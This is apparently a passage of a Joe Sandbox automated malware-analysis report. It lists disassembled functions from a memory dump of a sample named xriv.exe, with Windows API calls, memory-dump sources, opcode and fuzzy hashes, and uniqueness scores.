                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free
                                                                        • String ID: *?
                                                                        • API String ID: 269201875-2564092906
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 010B8FA2
                                                                        • CatchIt.LIBVCRUNTIME ref: 010B9088
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CatchEncodePointer
                                                                        • String ID: MOC$RCC
                                                                        • API String ID: 1435073870-2084237596
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AdjustPointer
                                                                        • String ID:
                                                                        • API String ID: 1740715915-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(0000011C,?,C73353B8,00000000), ref: 010A4D89
                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010A4DF0
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 010A4DF7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProcVersion
                                                                        • String ID:
                                                                        • API String ID: 3310240892-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _free.LIBCMT ref: 010C509E
                                                                        • _free.LIBCMT ref: 010C50C7
                                                                        • SetEndOfFile.KERNEL32(00000000,010C25FD,00000000,010BD4F0,?,?,?,?,?,?,?,010C25FD,010BD4F0,00000000), ref: 010C50F9
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,010C25FD,010BD4F0,00000000,?,?,?,?,00000000), ref: 010C5115
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _free$ErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 1547350101-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 010BAE0F: _free.LIBCMT ref: 010BAE1D
                                                                          • Part of subcall function 010C0971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,010C4B40,?,00000000,00000000), ref: 010C0A13
                                                                        • GetLastError.KERNEL32 ref: 010BFA02
                                                                        • __dosmaperr.LIBCMT ref: 010BFA09
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 010BFA48
                                                                        • __dosmaperr.LIBCMT ref: 010BFA4F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                        • String ID:
                                                                        • API String ID: 167067550-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,00000000,?,010BAD8D,00000000,?,?,?,010BAF26,?), ref: 010BDF49
                                                                        • _free.LIBCMT ref: 010BDFA6
                                                                        • _free.LIBCMT ref: 010BDFDC
                                                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,010BAF26,?), ref: 010BDFE7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast_free
                                                                        • String ID:
                                                                        • API String ID: 2283115069-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetLastError.KERNEL32(?,?,?,010BB7F5,010BDB7F,?,?,010B8272,?,?,?,?,?,010A20C3,?,?), ref: 010BE0A0
                                                                        • _free.LIBCMT ref: 010BE0FD
                                                                        • _free.LIBCMT ref: 010BE133
                                                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,010B8272,?,?,?,?,?,010A20C3,?,?), ref: 010BE13E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast_free
                                                                        • String ID:
                                                                        • API String ID: 2283115069-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,010BE9E2,00000000,?,010C370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 010BE893
                                                                        • GetLastError.KERNEL32(?,010C370A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,010BE9E2,00000000,00000104,?), ref: 010BE89D
                                                                        • __dosmaperr.LIBCMT ref: 010BE8A4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorFullLastNamePath__dosmaperr
                                                                        • String ID:
                                                                        • API String ID: 2398240785-0
                                                                        • Opcode ID: 432f8992eeadb08db929201ba7f206005e2ccfa0853a2f75b81f0538d106907d
                                                                        • Instruction ID: da6ec2370f07c2431e7295487884c33de95fa4162b1798ed97a957e284bb2c9f
                                                                        • Opcode Fuzzy Hash: 432f8992eeadb08db929201ba7f206005e2ccfa0853a2f75b81f0538d106907d
                                                                        • Instruction Fuzzy Hash: 56F08132600516BF9B201FA6DC888DABFAAFF542A03044961F99DC6110C732E860CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,010BE9E2,00000000,?,010C3695,00000000,00000000,010BE9E2,?,?,00000000,00000000,00000001), ref: 010BE8FC
                                                                        • GetLastError.KERNEL32(?,010C3695,00000000,00000000,010BE9E2,?,?,00000000,00000000,00000001,00000000,00000000,?,010BE9E2,00000000,00000104), ref: 010BE906
                                                                        • __dosmaperr.LIBCMT ref: 010BE90D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorFullLastNamePath__dosmaperr
                                                                        • String ID:
                                                                        • API String ID: 2398240785-0
                                                                        • Opcode ID: c9e18eb0d5d3b7ed1a821f20d59fee66289a96da7b87aa973c132e7b4a873f69
                                                                        • Instruction ID: 86936602a1237a7411a238203728e9d1335ff4e1347f358c47538836912f1cc1
                                                                        • Opcode Fuzzy Hash: c9e18eb0d5d3b7ed1a821f20d59fee66289a96da7b87aa973c132e7b4a873f69
                                                                        • Instruction Fuzzy Hash: 97F08C32200116BF8B701FA6C8889DAFFAAFF842A03044514FA9CC6110CB31E862CBD0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WriteConsoleW.KERNEL32(010A5140,0000000F,010D68F8,00000000,010A5140,?,010C5AA7,010A5140,00000001,010A5140,010A5140,?,010C2ECD,00000000,?,010A5140), ref: 010C63A6
                                                                        • GetLastError.KERNEL32(?,010C5AA7,010A5140,00000001,010A5140,010A5140,?,010C2ECD,00000000,?,010A5140,00000000,010A5140,?,010C3421,010A5140), ref: 010C63B2
                                                                          • Part of subcall function 010C6378: CloseHandle.KERNEL32(FFFFFFFE,010C63C2,?,010C5AA7,010A5140,00000001,010A5140,010A5140,?,010C2ECD,00000000,?,010A5140,00000000,010A5140), ref: 010C6388
                                                                        • ___initconout.LIBCMT ref: 010C63C2
                                                                          • Part of subcall function 010C633A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,010C6369,010C5A94,010A5140,?,010C2ECD,00000000,?,010A5140,00000000), ref: 010C634D
                                                                        • WriteConsoleW.KERNEL32(010A5140,0000000F,010D68F8,00000000,?,010C5AA7,010A5140,00000001,010A5140,010A5140,?,010C2ECD,00000000,?,010A5140,00000000), ref: 010C63D7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                        • String ID:
                                                                        • API String ID: 2744216297-0
                                                                        • Opcode ID: fd8a0b7f683fa17572d686cce490fd0120e4a7df2e9abda474a6e249786521fe
                                                                        • Instruction ID: 2dc28792d4a387f0f0e7a70cf55aa9c1a22f19769a6fe197f09b64c8760b7c21
                                                                        • Opcode Fuzzy Hash: fd8a0b7f683fa17572d686cce490fd0120e4a7df2e9abda474a6e249786521fe
                                                                        • Instruction Fuzzy Hash: A9F01C36401265BBCF721F95EC08A8D3F6AFB097A1B148014FE9895220C6378960DF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SleepConditionVariableCS.KERNELBASE(?,010B7157,00000064), ref: 010B71DD
                                                                        • LeaveCriticalSection.KERNEL32(010D9708,000000FF,?,010B7157,00000064,?,?,?,010A3E30,010DC468,C73353B8,?,00000000,010C8818,000000FF), ref: 010B71E7
                                                                        • WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,010B7157,00000064,?,?,?,010A3E30,010DC468,C73353B8,?,00000000,010C8818,000000FF), ref: 010B71F8
                                                                        • EnterCriticalSection.KERNEL32(010D9708,?,010B7157,00000064,?,?,?,010A3E30,010DC468,C73353B8,?,00000000,010C8818,000000FF), ref: 010B71FF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                        • String ID:
                                                                        • API String ID: 3269011525-0
                                                                        • Opcode ID: 81352007eb94421989410afe8a3bb33e65ff025bdd94a0bd65ce355f238c7dc6
                                                                        • Instruction ID: 581986280d3fcaee8af8fe1b44d0ebdc7bd24e402a60deb26b44112ab1155653
                                                                        • Opcode Fuzzy Hash: 81352007eb94421989410afe8a3bb33e65ff025bdd94a0bd65ce355f238c7dc6
                                                                        • Instruction Fuzzy Hash: 66E01A32641224AFCA221F95EC49ACD3E69FB48A66B020010FEC966154CB6B69109FE5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmp
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                        • API String ID: 0-2143882575
                                                                        • Opcode ID: 8096c2cb603f3a135269b42e4777f10cdf7fbce4c08b3f3b65bcf5e97a873a24
                                                                        • Instruction ID: 1b5366fb931668b5063f5589b3fa854662dca6ba8b1daa2f5cbc3bf0a774bc16
                                                                        • Opcode Fuzzy Hash: 8096c2cb603f3a135269b42e4777f10cdf7fbce4c08b3f3b65bcf5e97a873a24
                                                                        • Instruction Fuzzy Hash: BA41B771E00219AFDB21DF9DD9C09EEBBF8EF95714F1000AAF584D7200D6718A40CB94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%